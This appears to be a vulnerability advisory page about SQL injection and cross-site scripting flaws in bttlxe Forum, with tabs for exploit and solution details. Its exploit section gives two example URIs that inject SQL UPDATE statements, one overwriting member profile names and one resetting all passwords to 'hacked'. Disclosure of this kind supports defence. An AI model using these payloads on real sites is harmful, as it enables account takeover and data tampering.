• info
• discussion
• exploit
• solution
• references

bttlxe Forum Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, an attacker must entice a victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/myaccount/viewProfile.asp?member='update Members set ProfileName='hacked';--
http://www.example.com/myaccount/viewProfile.asp?member='update Members set Password='hacked';--

• /data/vulnerabilities/exploits/26790-xss.html